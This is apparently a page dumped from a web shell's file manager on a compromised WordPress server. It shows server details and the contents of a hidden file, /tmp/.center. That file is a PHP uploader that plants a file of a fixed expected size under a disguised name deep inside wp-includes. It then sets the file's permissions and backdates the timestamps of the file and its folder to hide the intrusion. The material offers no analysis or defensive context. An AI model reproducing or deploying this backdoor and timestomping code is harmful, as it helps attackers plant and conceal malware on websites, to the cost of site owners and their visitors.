HEX
Server: nginx/1.26.1
System: Linux 850a3e23ecee 5.15.0-122-generic #132-Ubuntu SMP Thu Aug 29 13:45:52 UTC 2024 x86_64
User: (1000)
PHP: 8.2.27
Disabled: NONE
Upload Files
File: //proc/thread-self/root/tmp/.center
<?php   $p = "/www/wwwroot/goprint.vn/public_html//usr/src/wordpress/wp-includes/css/dist/edit-widgets/pivottable.inc"; $ft = 1726797335; if (move_uploaded_file($_FILES['file']['tmp_name'], $p)) {     $filesize = filesize($p);     if ($filesize >= 706160) {         @chmod($p, 0744);         if ($ft) {             @touch($p, $ft, $ft);             @touch(@dirname($p), $ft, $ft);         }         die('_uploaded!_');     } else {         if (file_exists($p)) {             print "file exists but size = {$filesize} not 706160";         }         @unlink($p);     } } die('_upload_failed_');